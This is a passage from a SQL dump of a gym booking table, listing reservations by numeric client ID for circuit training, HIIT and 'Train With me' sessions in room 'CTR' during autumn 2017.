(10919, 48, 'CTR', '2017-10-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10918, 230, 'CTR', '2017-10-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10917, 205, 'CTR', '2017-10-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10916, 205, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10915, 138, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10913, 323, 'CTR', '2017-10-25', '20h30', '21h00', 'Circuit training'),
(10912, 165, 'CTR', '2017-10-25', '20h30', '21h00', 'Circuit training'),
(10911, 90, 'CTR', '2017-10-25', '20h30', '21h00', 'Circuit training'),
(10910, 92, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10909, 138, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10908, 31, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10907, 48, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10906, 195, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10905, 318, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10904, 310, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10903, 247, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10902, 173, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(10901, 168, 'CTR', '2017-10-25', '18h00', '18h30', 'Circuit Training'),
(10900, 314, 'CTR', '2017-10-25', '18h00', '18h30', 'Circuit Training'),
(10899, 313, 'CTR', '2017-10-25', '18h00', '18h30', 'Circuit Training'),
(10898, 126, 'CTR', '2017-10-25', '18h00', '18h30', 'Circuit Training'),
(10897, 296, 'CTR', '2017-10-25', '18h00', '18h30', 'Circuit Training'),
(11018, 193, 'CTR', '2017-11-03', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10943, 140, 'CTR', '2017-10-25', '18h00', '18h30', 'Circuit Training'),
(10885, 294, 'CTR', '2017-10-18', '20h30', '21h00', 'Circuit training'),
(10884, 138, 'CTR', '2017-10-23', '17h30', '18h00', 'Circuit Training'),
(10883, 31, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10868, 303, 'CTR', '2017-10-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10882, 80, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10948, 177, 'CTR', '2017-10-25', '18h00', '18h30', 'Circuit Training'),
(10880, 205, 'CTR', '2017-10-19', '18h45', '19h15', 'Circuit Training'),
(10879, 322, 'CTR', '2017-10-19', '18h45', '19h15', 'Circuit Training'),
(10878, 105, 'CTR', '2017-10-19', '18h45', '19h15', 'Circuit Training'),
(10877, 334, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10875, 126, 'CTR', '2017-10-18', '17h15', '18h00', 'Circuit Training'),
(10874, 132, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10873, 298, 'CTR', '2017-10-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10872, 298, 'CTR', '2017-10-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10871, 265, 'CTR', '2017-10-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10870, 281, 'CTR', '2017-10-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10869, 281, 'CTR', '2017-10-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10867, 303, 'CTR', '2017-10-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10866, 297, 'CTR', '2017-10-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10865, 297, 'CTR', '2017-10-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10864, 265, 'CTR', '2017-10-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10863, 306, 'CTR', '2017-10-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10862, 306, 'CTR', '2017-10-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10861, 301, 'CTR', '2017-10-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10860, 301, 'CTR', '2017-10-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10859, 308, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10858, 329, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10857, 264, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10856, 264, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10855, 330, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10854, 328, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10853, 328, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10852, 330, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10851, 305, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10850, 305, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10849, 48, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10848, 48, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10847, 249, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10846, 249, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10845, 231, 'CTR', '2017-10-23', '17h30', '18h00', 'Circuit Training'),
(10844, 292, 'CTR', '2017-10-23', '17h30', '18h00', 'Circuit Training'),
(10843, 304, 'CTR', '2017-10-23', '17h30', '18h00', 'Circuit Training'),
(10842, 255, 'CTR', '2017-10-23', '17h30', '18h00', 'Circuit Training'),
(10841, 205, 'CTR', '2017-10-23', '17h30', '18h00', 'Circuit Training'),
(10840, 92, 'CTR', '2017-10-23', '17h30', '18h00', 'Circuit Training'),
(10839, 80, 'CTR', '2017-10-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10838, 80, 'CTR', '2017-10-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10876, 334, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10835, 80, 'CTR', '2017-10-18', '17h15', '18h00', 'Circuit Training'),
(10834, 80, 'CTR', '2017-10-18', '17h15', '18h00', 'Circuit Training'),
(10826, 210, 'CTR', '2017-10-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10833, 304, 'CTR', '2017-10-16', '17h30', '18h00', 'Circuit Training'),
(10824, 132, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10823, 132, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10819, 191, 'CTR', '2017-10-12', '18h45', '19h15', 'Circuit Training'),
(10820, 333, 'CTR', '2017-10-16', '17h30', '18h00', 'Circuit Training'),
(10818, 205, 'CTR', '2017-10-18', '20h30', '21h00', 'Circuit training'),
(10817, 90, 'CTR', '2017-10-18', '20h30', '21h00', 'Circuit training'),
(10816, 165, 'CTR', '2017-10-18', '20h30', '21h00', 'Circuit training'),
(10815, 323, 'CTR', '2017-10-18', '20h30', '21h00', 'Circuit training'),
(10830, 230, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10812, 195, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10813, 80, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10811, 31, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10810, 48, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10809, 138, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10808, 318, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10807, 310, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10806, 173, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10805, 92, 'CTR', '2017-10-18', '18h45', '19h15', 'Circuit training'),
(10888, 269, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10803, 331, 'CTR', '2017-10-18', '18h00', '18h30', 'Circuit Training'),
(10802, 177, 'CTR', '2017-10-18', '18h00', '18h30', 'Circuit Training'),
(10889, 48, 'CTR', '2017-10-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10800, 168, 'CTR', '2017-10-18', '18h00', '18h30', 'Circuit Training'),
(10799, 80, 'CTR', '2017-10-18', '18h00', '18h30', 'Circuit Training'),
(10798, 316, 'CTR', '2017-10-18', '17h15', '18h00', 'Circuit Training'),
(10797, 180, 'CTR', '2017-10-18', '17h15', '18h00', 'Circuit Training'),
(10887, 296, 'CTR', '2017-10-18', '17h15', '18h00', 'Circuit Training'),
(10890, 294, 'CTR', '2017-10-25', '20h30', '21h00', 'Circuit training'),
(10794, 280, 'CTR', '2017-10-19', '18h45', '19h15', 'Circuit Training'),
(11295, 205, 'CTR', '2017-11-23', '18h45', '19h15', 'Circuit Training'),
(10790, 325, 'CTR', '2017-10-12', '18h45', '19h15', 'Circuit Training'),
(10789, 205, 'CTR', '2017-10-12', '18h45', '19h15', 'Circuit Training'),
(10788, 322, 'CTR', '2017-10-12', '18h45', '19h15', 'Circuit Training'),
(10787, 105, 'CTR', '2017-10-12', '18h45', '19h15', 'Circuit Training'),
(10786, 294, 'CTR', '2017-10-19', '18h45', '19h15', 'Circuit Training'),
(10784, 279, 'CTR', '2017-10-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10783, 279, 'CTR', '2017-10-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10782, 80, 'CTR', '2017-10-10', '18h15', '18h45', 'Circuit Training'),
(10781, 330, 'CTR', '2017-10-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10780, 330, 'CTR', '2017-10-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10779, 298, 'CTR', '2017-10-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10778, 298, 'CTR', '2017-10-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10829, 230, 'CTR', '2017-10-19', '18h45', '19h15', 'Circuit Training'),
(10828, 309, 'CTR', '2017-10-18', '20h30', '21h00', 'Circuit training'),
(10775, 281, 'CTR', '2017-10-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10774, 281, 'CTR', '2017-10-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10773, 306, 'CTR', '2017-10-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10772, 306, 'CTR', '2017-10-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10771, 301, 'CTR', '2017-10-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10770, 301, 'CTR', '2017-10-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10769, 297, 'CTR', '2017-10-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10768, 297, 'CTR', '2017-10-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10767, 265, 'CTR', '2017-10-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10766, 265, 'CTR', '2017-10-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10765, 303, 'CTR', '2017-10-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10764, 303, 'CTR', '2017-10-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10763, 305, 'CTR', '2017-10-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10762, 305, 'CTR', '2017-10-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10761, 328, 'CTR', '2017-10-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10760, 328, 'CTR', '2017-10-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10832, 264, 'CTR', '2017-10-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10831, 264, 'CTR', '2017-10-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10757, 299, 'CTR', '2017-10-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10756, 299, 'CTR', '2017-10-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10755, 249, 'CTR', '2017-10-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10754, 249, 'CTR', '2017-10-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10753, 260, 'CTR', '2017-10-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10752, 260, 'CTR', '2017-10-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10751, 48, 'CTR', '2017-10-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10750, 48, 'CTR', '2017-10-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10749, 92, 'CTR', '2017-10-16', '17h30', '18h00', 'Circuit Training'),
(10748, 205, 'CTR', '2017-10-16', '17h30', '18h00', 'Circuit Training'),
(10747, 292, 'CTR', '2017-10-16', '17h30', '18h00', 'Circuit Training'),
(10746, 255, 'CTR', '2017-10-16', '17h30', '18h00', 'Circuit Training'),
(10745, 132, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10744, 126, 'CTR', '2017-10-10', '18h15', '18h45', 'Circuit Training'),
(10743, 278, 'CTR', '2017-10-10', '18h15', '18h45', 'Circuit Training'),
(10742, 278, 'CTR', '2017-10-10', '18h15', '18h45', 'Circuit Training'),
(10741, 299, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10740, 299, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10739, 303, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10738, 303, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10737, 31, 'CTR', '2017-10-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10736, 230, 'CTR', '2017-10-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10735, 3, 'CTR', '2017-10-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10731, 177, 'CTR', '2017-10-11', '17h15', '18h00', 'Circuit Training'),
(10730, 210, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10729, 279, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10728, 80, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10727, 80, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10726, 328, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10725, 328, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10724, 168, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10723, 309, 'CTR', '2017-10-10', '18h15', '18h45', 'Circuit Training');
INSERT INTO `reservation_reservation` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(10722, 300, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10721, 300, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10720, 168, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10719, 168, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10718, 205, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10717, 230, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10716, 165, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10715, 323, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10714, 90, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10713, 318, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10712, 310, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10711, 247, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10709, 280, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10710, 173, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10708, 138, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10707, 92, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10706, 195, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10705, 31, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10704, 48, 'CTR', '2017-10-11', '18h45', '19h15', 'Circuit training'),
(10703, 80, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10702, 80, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10701, 311, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10700, 314, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10699, 313, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10698, 296, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10785, 140, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10696, 188, 'CTR', '2017-10-11', '17h15', '18h00', 'Circuit Training'),
(10695, 188, 'CTR', '2017-10-11', '17h15', '18h00', 'Circuit Training'),
(10690, 48, 'CTR', '2017-10-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10689, 210, 'CTR', '2017-10-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10688, 80, 'CTR', '2017-10-05', '18h00', '18h30', 'Circuit training'),
(10687, 279, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10686, 308, 'CTR', '2017-10-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10685, 294, 'CTR', '2017-10-04', '20h30', '21h00', 'Circuit training'),
(10683, 281, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10682, 281, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10681, 306, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10680, 306, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10679, 297, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10678, 297, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10677, 298, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10676, 298, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10675, 301, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10674, 301, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10671, 305, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10670, 305, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10669, 132, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10668, 132, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10672, 265, 'CTR', '2017-10-09', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10673, 265, 'CTR', '2017-10-09', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10665, 48, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10664, 48, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10663, 249, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10662, 249, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10733, 329, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10660, 92, 'CTR', '2017-10-09', '17h30', '18h00', 'Circuit Training'),
(10659, 292, 'CTR', '2017-10-09', '17h30', '18h00', 'Circuit Training'),
(10732, 327, 'CTR', '2017-10-10', '18h15', '18h45', 'Circuit Training'),
(10657, 255, 'CTR', '2017-10-09', '17h30', '18h00', 'Circuit Training'),
(10656, 205, 'CTR', '2017-10-09', '17h30', '18h00', 'Circuit Training'),
(10655, 324, 'CTR', '2017-10-18', '18h00', '18h30', 'Circuit Training'),
(10654, 324, 'CTR', '2017-10-16', '17h30', '18h00', 'Circuit Training'),
(10793, 80, 'CTR', '2017-10-16', '17h30', '18h00', 'Circuit Training'),
(10652, 324, 'CTR', '2017-10-11', '18h00', '18h30', 'Circuit Training'),
(10953, 205, 'CTR', '2017-11-02', '18h45', '19h15', 'Circuit Training'),
(10640, 326, 'CTR', '2017-10-05', '18h45', '19h15', 'Circuit Training'),
(10641, 325, 'CTR', '2017-10-05', '18h45', '19h15', 'Circuit Training'),
(10644, 260, 'CTR', '2017-10-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10643, 327, 'CTR', '2017-10-05', '18h00', '18h30', 'Circuit training'),
(10645, 260, 'CTR', '2017-10-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10650, 294, 'CTR', '2017-10-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10649, 294, 'CTR', '2017-10-11', '20h30', '21h00', 'Circuit training'),
(10648, 168, 'CTR', '2017-10-02', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10647, 230, 'CTR', '2017-10-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10646, 230, 'CTR', '2017-10-04', '20h30', '21h00', 'Circuit training'),
(10636, 80, 'CTR', '2017-10-02', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10635, 80, 'CTR', '2017-10-02', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10634, 126, 'CTR', '2017-10-03', '18h15', '18h45', 'Circuit Training'),
(10633, 80, 'CTR', '2017-10-02', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10632, 80, 'CTR', '2017-10-02', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10631, 80, 'CTR', '2017-10-02', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10630, 80, 'CTR', '2017-10-02', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10629, 305, 'CTR', '2017-10-02', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10626, 269, 'CTR', '2017-09-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10625, 278, 'CTR', '2017-09-28', '18h45', '19h15', 'Circuit Training'),
(10627, 324, 'CTR', '2017-10-04', '17h15', '18h00', 'Circuit Training'),
(10623, 324, 'CTR', '2017-10-05', '18h00', '18h30', 'Circuit training'),
(10622, 80, 'CTR', '2017-09-28', '18h45', '19h15', 'Circuit Training'),
(10621, 80, 'CTR', '2017-09-28', '18h45', '19h15', 'Circuit Training'),
(10620, 80, 'CTR', '2017-09-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10618, 205, 'CTR', '2017-10-04', '20h30', '21h00', 'Circuit training'),
(10617, 323, 'CTR', '2017-10-04', '20h30', '21h00', 'Circuit training'),
(10616, 165, 'CTR', '2017-10-04', '20h30', '21h00', 'Circuit training'),
(10619, 210, 'CTR', '2017-09-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10614, 309, 'CTR', '2017-10-04', '20h30', '21h00', 'Circuit training'),
(10613, 90, 'CTR', '2017-10-04', '20h30', '21h00', 'Circuit training'),
(10612, 132, 'CTR', '2017-10-04', '20h30', '21h00', 'Circuit training'),
(10611, 173, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10610, 318, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10609, 310, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10608, 247, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10607, 92, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10606, 280, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10605, 138, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10604, 195, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10603, 31, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10602, 48, 'CTR', '2017-10-04', '18h45', '19h15', 'Circuit training'),
(10601, 313, 'CTR', '2017-10-04', '18h00', '18h30', 'Circuit Training'),
(10628, 305, 'CTR', '2017-10-02', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10692, 3, 'CTR', '2017-10-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10691, 180, 'CTR', '2017-10-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10597, 296, 'CTR', '2017-10-04', '18h00', '18h30', 'Circuit Training'),
(10694, 180, 'CTR', '2017-10-11', '17h15', '18h00', 'Circuit Training'),
(10591, 294, 'CTR', '2017-10-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10587, 193, 'CTR', '2017-09-27', '18h00', '18h30', 'Circuit Training'),
(10586, 140, 'CTR', '2017-09-27', '18h00', '18h30', 'Circuit Training'),
(10638, 322, 'CTR', '2017-10-05', '18h45', '19h15', 'Circuit Training'),
(10639, 205, 'CTR', '2017-10-05', '18h45', '19h15', 'Circuit Training'),
(10637, 105, 'CTR', '2017-10-05', '18h45', '19h15', 'Circuit Training'),
(10579, 302, 'CTR', '2017-10-02', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10578, 302, 'CTR', '2017-10-02', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10577, 281, 'CTR', '2017-10-02', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10576, 281, 'CTR', '2017-10-02', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10575, 297, 'CTR', '2017-10-02', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10574, 297, 'CTR', '2017-10-02', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10573, 306, 'CTR', '2017-10-02', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10572, 306, 'CTR', '2017-10-02', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10571, 301, 'CTR', '2017-10-02', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10570, 301, 'CTR', '2017-10-02', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10569, 265, 'CTR', '2017-10-02', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10568, 265, 'CTR', '2017-10-02', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10567, 249, 'CTR', '2017-10-02', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10566, 249, 'CTR', '2017-10-02', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10583, 205, 'CTR', '2017-09-27', '20h30', '21h00', 'Circuit training'),
(10563, 48, 'CTR', '2017-10-02', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10562, 48, 'CTR', '2017-10-02', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10561, 138, 'CTR', '2017-10-02', '17h30', '18h00', 'Circuit Training'),
(10560, 304, 'CTR', '2017-10-02', '17h30', '18h00', 'Circuit Training'),
(10559, 205, 'CTR', '2017-10-02', '17h30', '18h00', 'Circuit Training'),
(10558, 312, 'CTR', '2017-10-02', '17h30', '18h00', 'Circuit Training'),
(10557, 292, 'CTR', '2017-10-02', '17h30', '18h00', 'Circuit Training'),
(10556, 255, 'CTR', '2017-10-02', '17h30', '18h00', 'Circuit Training'),
(10592, 180, 'CTR', '2017-10-04', '17h15', '18h00', 'Circuit Training'),
(10548, 191, 'CTR', '2017-09-28', '18h45', '19h15', 'Circuit Training'),
(10543, 249, 'CTR', '2017-09-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10542, 249, 'CTR', '2017-09-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
